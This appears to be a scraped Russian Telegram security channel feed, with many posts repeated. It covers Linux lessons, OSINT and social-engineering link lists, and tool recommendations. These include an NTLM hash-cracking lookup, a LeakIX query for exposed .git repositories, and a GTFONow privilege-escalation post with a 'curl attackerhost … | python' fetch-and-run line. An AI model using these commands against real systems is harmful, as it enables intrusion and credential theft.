Forwarded from Бэкдор
Яндекс Браузер с помощью нейронок каждый день предотвращает 1,5 млн попыток перехода на сайты мошенников. Браузер ловит за руку фишинговые сайты, даже если их создали только что и вы первый посетитель.
Алгоритм анализирует сотни фактов: когда был создан сайт, ищут ли его в поиске, как часто его посещают и часто ли возвращаются. Если браузер заподозрит неладное — предупредит, что ресурс опасен. С начала тестирования так попались уже 400 тысяч (!) мошеннических сайтов.
Наконец-то родственники больше не будут вводить данные карты на сайте ozom.ru
@whackdoor
Алгоритм анализирует сотни фактов: когда был создан сайт, ищут ли его в поиске, как часто его посещают и часто ли возвращаются. Если браузер заподозрит неладное — предупредит, что ресурс опасен. С начала тестирования так попались уже 400 тысяч (!) мошеннических сайтов.
Наконец-то родственники больше не будут вводить данные карты на сайте ozom.ru
@whackdoor
Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!
#статья
Третья серия материалов: "Работа с файлами и директориями"
Управление правами доступа к файлам и директориям для пользователей и групп.
Первая серия материалов.
Вторая серия материалов.
LH | Новости | Курсы | Мемы
#статья
Третья серия материалов: "Работа с файлами и директориями"
Управление правами доступа к файлам и директориям для пользователей и групп.
Первая серия материалов.
Вторая серия материалов.
LH | Новости | Курсы | Мемы
Telegraph
Управление правами доступа к файлам и директориям для пользователей и групп.
В Linux каждый файл и директория имеют свои права доступа, которые определяют, какие операции могут быть выполнены над ними пользователем, группой пользователей или остальными пользователями. Права доступа в Linux представляются в виде трёх групп: владелец…
Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!
#статья
Третья серия материалов: "Работа с файлами и директориями"
Просмотр информации о пользователях и группах: команды id, whoami и другие.
Первая серия материалов.
Вторая серия материалов.
LH | Новости | Курсы | Мемы
#статья
Третья серия материалов: "Работа с файлами и директориями"
Просмотр информации о пользователях и группах: команды id, whoami и другие.
Первая серия материалов.
Вторая серия материалов.
LH | Новости | Курсы | Мемы
Telegraph
Просмотр информации о пользователях и группах: команды id, whoami и другие.
Одной из ключевых обязанностей системного администратора в операционной системе Linux является контроль и управление пользователями. Каждый пользователь обладает определенными привилегиями и ограничениями, которые необходимо регулировать. В данном материале…
Forwarded from IT курсы / Программирование
В данном курсе вы научитесь автоматизировать процесс сборки, тестирования и развертывания ПО в контейнерах Docker. Это позволяет ускорить процесс разработки и уменьшить время на развертывание ПО в производственной среде.
Смотреть курс
LH | Новости | Курсы | Мемы
Please open Telegram to view this post
VIEW IN TELEGRAM
NTLM to password
База данных предварительно вычисленных NTLM-хэшей почти на 9 миллиардов записей.
Искать лучше через API, стоимость поиска зависит от способа:
— через форму на главной: 10 поинтов/хэш
— через API: 5 поинтов/хэш
— через балковое (для частых запросов) API: 4 поинта/хэш
Квота на использование пополняется на 5000 поинтов каждые 15 минут.
Пример использования:
Или:
Ссылка на сервис!
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
База данных предварительно вычисленных NTLM-хэшей почти на 9 миллиардов записей.
Искать лучше через API, стоимость поиска зависит от способа:
— через форму на главной: 10 поинтов/хэш
— через API: 5 поинтов/хэш
— через балковое (для частых запросов) API: 4 поинта/хэш
Квота на использование пополняется на 5000 поинтов каждые 15 минут.
Пример использования:
Invoke-WebRequest https://ntlm.pw/[32-character hash] | Select-Object -Expand Content
Или:
curl https://ntlm[.]pw/[/[32-character hash]
Ссылка на сервис!
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!
#статья
Третья серия материалов: "Работа с файлами и директориями"
Ограничение доступа пользователей к определенным ресурсам: команды chroot и sudo.
Первая серия материалов.
Вторая серия материалов.
LH | Новости | Курсы | Мемы
#статья
Третья серия материалов: "Работа с файлами и директориями"
Ограничение доступа пользователей к определенным ресурсам: команды chroot и sudo.
Первая серия материалов.
Вторая серия материалов.
LH | Новости | Курсы | Мемы
Telegraph
Ограничение доступа пользователей к определенным ресурсам: команды chroot и sudo.
Chroot - это утилита Linux, которая позволяет создавать изолированное окружение для запуска приложений. Она помогает обеспечить безопасность, провести тестирование и восстановление системы. Команда chroot требует прав администратора. Команда chroot позволяет…
Топ популярных постов за прошедшую неделю (сохрани себе и отправь другу):
1. Предыдущий топ статей
2. AWS
3. Обозреваем и практикуем популярные OSINT инструменты
4. Топ 5 инструментов для поиска уязвимостей и эксплоитов
5. Vault7 - огромная коллекция различных документов, публикуемых Wikileaks с 2017 года
6. LEGBA - это многопротокольный брутфорсер учетных данных
7. Attacking Docker
8. 𝗔𝗪𝗦 𝗢𝗦𝗜𝗡𝗧 𝗯𝘆 𝗗𝗼𝗿𝗸𝗶𝗻𝗴
#подборка
LH | Новости | Курсы | Мемы
1. Предыдущий топ статей
2. AWS
3. Обозреваем и практикуем популярные OSINT инструменты
4. Топ 5 инструментов для поиска уязвимостей и эксплоитов
5. Vault7 - огромная коллекция различных документов, публикуемых Wikileaks с 2017 года
6. LEGBA - это многопротокольный брутфорсер учетных данных
7. Attacking Docker
8. 𝗔𝗪𝗦 𝗢𝗦𝗜𝗡𝗧 𝗯𝘆 𝗗𝗼𝗿𝗸𝗶𝗻𝗴
#подборка
LH | Новости | Курсы | Мемы
Подборка полезных материалов про OSINT #1:
• Расширение OSINT Chrome: ThreatPinch Lookup.
• Сбор информации при помощи технологии OSINT в связке с DataSploit
• Сбор информации о человеке из открытых баз данных
• OSINT на платформе Telegram
• OSINT. Определение местоположения по фотографии. Глобальные и местные индикаторы. Часть 1
• OSINT. Определение местоположения по фотографии. Глобальные и местные индикаторы. Часть 2
• OSINT. Собираем информацию по Email
• Полезные и актуальные инструменты для OSINT
• Социальная инженерия. Целенаправленные атаки. OSINT
• OSINT. Инструменты для поиска информации о цели
• CSI Linux. Дистрибутив для кибер-расследований и OSINT
• Поиск (пробив) человека с помощью ботов Telegaram с наличием минимальной исходной информацией
• Offensive OSINT часть 1 - OSINT & RDP
• Offensive OSINT часть 2 - Деобфускация и анализ исходного кода + обнаружение сети распространения нелегального контента
• Offensive OSINT часть 3 - Ищем дезинформацию, связанную с выборами, на польском сервисе wykop.pl
• Поиск информации по номеру телефона.
Часть 1
• Разведка и сбора информации — обзор инструментария OSINT
• Snoop Project инструмент разведки на основе открытых данных (OSINT world)
• Инструменты OSINT, которые ускорят исследования в сети
#подборка
LH | Новости | Курсы | Мемы
Please open Telegram to view this post
VIEW IN TELEGRAM
На третьей неделе курса "Linux для новичков" мы изучили основные команды для управления пользователями и группами в Linux. Мы научились создавать и удалять пользователей и группы, управлять правами доступа, и познакомились с командами chroot и sudo.
Если вы что-то пропустили и желаете прочитать, то вот список материалов третей недели:
•Создание и удаление пользователей в Linux: команды useradd и userdel.
•Управление паролями пользователей: команда passwd.
•Назначение пользователей в группы: команда usermod.
•Создание и удаление групп в Linux: команды groupadd и groupdel.
•Управление правами доступа к файлам и директориям для пользователей и групп.
•Просмотр информации о пользователях и группах: команды id, whoami и др.
•Ограничение доступа пользователей к определенным ресурсам: команды chroot и sudo.
Не забывайте следить и делиться нашим бесплатным курсом "Linux для новичков"!
Первая серия материалов.
Вторая серия материалов.
Следующую неделю мы посвятим теме «Сетевые возможности Linux».
#Linux #обучениеlinux #статьипоLinux
LH | Новости | Курсы | Мемы
Если вы что-то пропустили и желаете прочитать, то вот список материалов третей недели:
Неделя 3: Управление пользователями и группами
•Создание и удаление пользователей в Linux: команды useradd и userdel.
•Управление паролями пользователей: команда passwd.
•Назначение пользователей в группы: команда usermod.
•Создание и удаление групп в Linux: команды groupadd и groupdel.
•Управление правами доступа к файлам и директориям для пользователей и групп.
•Просмотр информации о пользователях и группах: команды id, whoami и др.
•Ограничение доступа пользователей к определенным ресурсам: команды chroot и sudo.
Не забывайте следить и делиться нашим бесплатным курсом "Linux для новичков"!
Первая серия материалов.
Вторая серия материалов.
Следующую неделю мы посвятим теме «Сетевые возможности Linux».
#Linux #обучениеlinux #статьипоLinux
LH | Новости | Курсы | Мемы
GTFONow
Данный инструмент предназначен для автоматической эскалации привилегий в Unix-подобных системах через команду sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins.
Возможности:
— Автоматическая эксплуатация неправильно настроенных разрешений sudo.
— Автоматическая эксплуатация неправильно настроенных разрешений suid, sgid.
— Автоматическая эксплуатация неправильных настроенных компонентов ОС.
— Автоматическая эксплуатация через SSH-ключи.
— Автоматическая эксплуатация через файл используемый в cron.
— Автоматическая эксплуатация через переменную окружения LD_PRELOAD.
— Легкий запуск без файлов с помощью
Ссылка на GitHub.
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
Данный инструмент предназначен для автоматической эскалации привилегий в Unix-подобных системах через команду sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins.
Возможности:
— Автоматическая эксплуатация неправильно настроенных разрешений sudo.
— Автоматическая эксплуатация неправильно настроенных разрешений suid, sgid.
— Автоматическая эксплуатация неправильных настроенных компонентов ОС.
— Автоматическая эксплуатация через SSH-ключи.
— Автоматическая эксплуатация через файл используемый в cron.
— Автоматическая эксплуатация через переменную окружения LD_PRELOAD.
— Легкий запуск без файлов с помощью
curl http://attackerhost/gtfonow.py | python
Ссылка на GitHub.
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
Reb, Blue, Yellow Team. Противостояние или партнёрство в киберпространстве
#статья
Сегодня поговорим с вами на тему, так называемых, команд в сфере информационной безопасности. В основном эта статья предназначена для тех, кто только начинает свой путь в этом направлении или просто до сих пор не определился к какой из "команд" он хочет примкнуть. Мы разберемся как команды и их совместная деятельность дополняют друг друга, и что они из себя представляют.
Читать статью.
LH | Новости | Курсы | Мемы
#статья
Сегодня поговорим с вами на тему, так называемых, команд в сфере информационной безопасности. В основном эта статья предназначена для тех, кто только начинает свой путь в этом направлении или просто до сих пор не определился к какой из "команд" он хочет примкнуть. Мы разберемся как команды и их совместная деятельность дополняют друг друга, и что они из себя представляют.
Читать статью.
LH | Новости | Курсы | Мемы
Подборка полезных материалов про OSINT #2:
• OSINT инструменты для Instagram и Facebook
• OSINT с FOCA: что можно узнать из публичных источников?
• CSI Linux. Полное руководство по OSINT. Часть 1. Domain Tools
• Сбор информации с помощью OSINT. Часть 1
• Сбор информации с помощью OSINT. Часть 2
• Поиск и анализ страниц ВКонтакте. OSINT и социальные сети
• Навыки OSINT(интернет-разведки) в кибербезопасности
• Учебное пособие OSINT для отслеживания информации о самолете и рейсе в режиме реального времени
• Ищем профиль по имени пользователя (OSINT)
• Комплексные инструменты OSINT. Сбор информации в сети
• Terra – инструмент OSINT для Twitter и Instagram
• Поиск в мире IoT. Альтернативы Shodan и Censys или OSINT по-китайски. Часть 1
• Комплексные инструменты OSINT. Сбор информации в сети. Часть 2
• Osint-San — инструмент, с которым можно стать кибердетективом
• Обзор Tsurugi Linux. Японское качество OSINT
• Как использовать sherlock
• Простой OSINT с использованием инструмента infooze V 1.0 [С примерами]
• Как выполнять OSINT в браузере с помощью Mitaka
• Сбор информации в Instagram с Osintgram на Kali Linux
• Открытый код. Мой топ 4 инструмента в сфере OSINT
• Открытый код. Инструменты OSINT.
• Telepathy - Набор инструментов для OSINT, позволяющий исследовать Telegram-чаты.
• Hunxploit04 – новый OSINT-инструмент для сбора
информации
• Maryam: Open-source Intelligence(OSINT) Framework
Подборка полезных материалов про OSINT #1
#подборка
LH | Новости | Курсы | Мемы
Please open Telegram to view this post
VIEW IN TELEGRAM
Поиск уязвимых хостов с помощью LeakIX
Поисковая система, похожая на Shodan, с основным отличием - она ориентируется на разного рода утечки информации. Интересный способ, когда нужно по-быстрому проверить на некоторые типы уязвимостей. Например по запросу:
Есть и другие, не менее интересные плагины, список которых представлен тут.
Ссылка на сервис.
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
Поисковая система, похожая на Shodan, с основным отличием - она ориентируется на разного рода утечки информации. Интересный способ, когда нужно по-быстрому проверить на некоторые типы уязвимостей. Например по запросу:
+target_name +plugin:"GitConfigHttpPlugin"
Получим список хостов с открытыми .git
репозиториями, в которых, как известно, бывает немало полезной информации.Есть и другие, не менее интересные плагины, список которых представлен тут.
Ссылка на сервис.
LH | Новости | Курсы | Мемы
#рекомендация
#рекомендации
Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!
#статья
Четвёртая серия материалов: "сетевые возможности Linux"
Конфигурация сети в Linux: настройка IP-адреса, маски подсети, шлюза.
Первая серия материалов.
Вторая серия материалов.
Третья серия материалов.
LH | Новости | Курсы | Мемы
#статья
Четвёртая серия материалов: "сетевые возможности Linux"
Конфигурация сети в Linux: настройка IP-адреса, маски подсети, шлюза.
Первая серия материалов.
Вторая серия материалов.
Третья серия материалов.
LH | Новости | Курсы | Мемы
Telegraph
Конфигурация сети в Linux: настройка IP-адреса, маски подсети, шлюза.
В современном мире компьютерные сети играют важную роль в обмене информацией и обеспечении связи между различными устройствами. Для правильного функционирования сети необходимо правильно сконфигурировать устройства, подключенные к ней. Сегодня мы рассмотрим…
Знали ли вы о том, что даже полузабытый инстанс IIS может быть использован злоумышленниками для закрепления? Нужно только.....
#статья
Как же хорошо, что любые энтерпрайз Windows-продукты имеют приятную возможность для расширения. Берите и пишите что хотите, когда хотите и как хотите! IIS — не исключение. Внутри него можно зарегистрировать DLLку, которая будет обрабатывать все HTTP-запросы. Казалось бы, обычный функционал? Но как злоумышленники могут использовать его в своих целях? Давайте разбираться на практике.
Материал можно почитать тут.
LH | Новости | Курсы | Мемы
#статья
Как же хорошо, что любые энтерпрайз Windows-продукты имеют приятную возможность для расширения. Берите и пишите что хотите, когда хотите и как хотите! IIS — не исключение. Внутри него можно зарегистрировать DLLку, которая будет обрабатывать все HTTP-запросы. Казалось бы, обычный функционал? Но как злоумышленники могут использовать его в своих целях? Давайте разбираться на практике.
Материал можно почитать тут.
LH | Новости | Курсы | Мемы
Продолжаем знакомить вас с увлекательным миром "OSINT" и предоставляем следующую порцию полезной информации на эту тему.
Подборка полезных материалов про OSINT #3:
• Топ 5 сервисов для определения геолокации по фото
• Orca – фреймворк для целевого OSINT
• Боевой Linux. Обзор самых мощных дистрибутивов для пентестов и OSINT
• Как узнать информацию о пользователе Telegram
• TorBot — интеллектуальный OSINT-инструмент с открытым исходным кодом, написанный на Python.
• Metaforge: инструмент анализа метаданных OSINT
• The Atypical OSINT Guide
• Zehef - инструмент osint для отслеживания электронной почты.
• 007-TheBond - OSINT инструмент, поможет вам собрать информацию о любом человеке.
• OSINT: поиск по электронный почте
• Seekr - Универсальный набор инструментов для сбора и управления OSINT-данными с удобным веб-интерфейсом.
• Сканируем сеть. Собираем информацию об организациях
• bbot — рекурсивный интернет-сканер для хакеров, вдохновленный Spiderfoot.
• Расширяем арсенал OSINT: Пять инструментов для анализа и поиска данных
• Обозреваем и практикуем популярные OSINT инструменты
Подборка полезных материалов про OSINT #1
Подборка полезных материалов про OSINT #2
#подборка
LH | Новости | Курсы | Мемы
Please open Telegram to view this post
VIEW IN TELEGRAM
Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!
#статья
Четвёртая серия материалов: "сетевые возможности Linux"
Проверка сетевого подключения: команда ping.
Первая серия материалов.
Вторая серия материалов.
Третья серия материалов.
LH | Новости | Курсы | Мемы
#статья
Четвёртая серия материалов: "сетевые возможности Linux"
Проверка сетевого подключения: команда ping.
Первая серия материалов.
Вторая серия материалов.
Третья серия материалов.
LH | Новости | Курсы | Мемы
Telegraph
Проверка сетевого подключения: команда ping.
У Linux есть очень много инструментов облегчающих администрирование и диагностику сети. В этом плане команда PING является одним из самых полезных инструментов для системных и сетевых администраторов. Сама базовая возможность этой утилиты – определить доступен…
Боты и сервисы для разведки данных Вконтакте
#статья
Продолжаю серию статей "ШХ" на тему OSINT. В прошлой статье рассмотрели варианты поиска по никнейму, благодаря которому смогли узнать почту и сопоставить аккаунты в социальных сетях.
Социальные сети стали неотъемлемой частью современной жизни, где люди активно делятся своими мыслями, фотографиями, интересами и информацией о себе. ВКонтакте, как одна из крупнейших платформ для общения, предоставляет уникальные возможности для проведения OSINT-исследования. Сегодня мы рассмотрим веб-ресурсы, ботов и методы поиска на примере социальной сети Вконтакте (VK).
Приятного чтения!
LH | Новости | Курсы | Мемы
#статья
Продолжаю серию статей "ШХ" на тему OSINT. В прошлой статье рассмотрели варианты поиска по никнейму, благодаря которому смогли узнать почту и сопоставить аккаунты в социальных сетях.
Социальные сети стали неотъемлемой частью современной жизни, где люди активно делятся своими мыслями, фотографиями, интересами и информацией о себе. ВКонтакте, как одна из крупнейших платформ для общения, предоставляет уникальные возможности для проведения OSINT-исследования. Сегодня мы рассмотрим веб-ресурсы, ботов и методы поиска на примере социальной сети Вконтакте (VK).
Приятного чтения!
LH | Новости | Курсы | Мемы
Social Engineering
Социальная инженерия – это метод манипуляции людьми с целью получения конфиденциальной информации или доступа к защищенным системам. Этот метод часто используется хакерами или мошенниками для достижения своих целей.
Понимание этого метода манипуляции и знание способов защиты от него поможет повысить уровень безопасности как в интернете, так и в реальной жизни. Надеемся, что данная подборка будет полезной для всех, кто хочет разобраться в этой теме.
• Социальная инженерия из первых рук.
• Социальная инженерия что это и как избежать.
• Социальная инженерия — методология проведения атак.
• Что означает социальная инженерия? Основы манипуляции.
• Социальная инженерия в Instagram.
• Социальная инженерия. Целенаправленные атаки. OSINT.
• Социальная инженерия. Практики, методы и инструменты для социотехнического тестирования. Часть 1
• Социальная инженерия. Практики, методы и инструменты для социотехнического тестирования. Часть 2
• Социальная инженерия. Атака на Сбербанк
• Методы социальной инженерии
• Взлом Facebook и Google с применением социальной инженерии
• Как взломать человека. Примеры социальной инженерии
• Социальная инженерия: как преступники эксплуатируют поведение человека
• Профайлинг и Социальная инженерия
• Взлом (Facebook.com VK.com Odnoklassniki.ru) или как Узнать пароль подружки!
• Автоматизация процесса сбора информации в социальной инженерии с помощью Rapportive
• Социальная инженерия. Целенаправленные атаки. OSINT
• Social Engineering - А что если...
• The Social-Engineer Toolkit.
• SET в Kali Linux для фишинговых атак
#подборка
LH | Новости | Курсы | Мемы
Социальная инженерия – это метод манипуляции людьми с целью получения конфиденциальной информации или доступа к защищенным системам. Этот метод часто используется хакерами или мошенниками для достижения своих целей.
Понимание этого метода манипуляции и знание способов защиты от него поможет повысить уровень безопасности как в интернете, так и в реальной жизни. Надеемся, что данная подборка будет полезной для всех, кто хочет разобраться в этой теме.
• Социальная инженерия из первых рук.
• Социальная инженерия что это и как избежать.
• Социальная инженерия — методология проведения атак.
• Что означает социальная инженерия? Основы манипуляции.
• Социальная инженерия в Instagram.
• Социальная инженерия. Целенаправленные атаки. OSINT.
• Социальная инженерия. Практики, методы и инструменты для социотехнического тестирования. Часть 1
• Социальная инженерия. Практики, методы и инструменты для социотехнического тестирования. Часть 2
• Социальная инженерия. Атака на Сбербанк
• Методы социальной инженерии
• Взлом Facebook и Google с применением социальной инженерии
• Как взломать человека. Примеры социальной инженерии
• Социальная инженерия: как преступники эксплуатируют поведение человека
• Профайлинг и Социальная инженерия
• Взлом (Facebook.com VK.com Odnoklassniki.ru) или как Узнать пароль подружки!
• Автоматизация процесса сбора информации в социальной инженерии с помощью Rapportive
• Социальная инженерия. Целенаправленные атаки. OSINT
• Social Engineering - А что если...
• The Social-Engineer Toolkit.
• SET в Kali Linux для фишинговых атак
#подборка
LH | Новости | Курсы | Мемы
Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!
#статья
Четвёртая серия материалов: "сетевые возможности Linux"
Конфигурация сетевых интерфейсов: команды ifconfig и ip.
Первая серия материалов.
Вторая серия материалов.
Третья серия материалов.
LH | Новости | Курсы | Мемы
#статья
Четвёртая серия материалов: "сетевые возможности Linux"
Конфигурация сетевых интерфейсов: команды ifconfig и ip.
Первая серия материалов.
Вторая серия материалов.
Третья серия материалов.
LH | Новости | Курсы | Мемы
Telegraph
Конфигурация сетевых интерфейсов: команды ifconfig и ip.
Как сетевые администраторы или кто-либо, кто занимается устранением неполадок в сети, вы часто сталкиваетесь с терминами «ifconfig» и «ip». Обе эти команды используются в операционных системах на базе Unix для настройки сетевого интерфейса, но что их отличает?…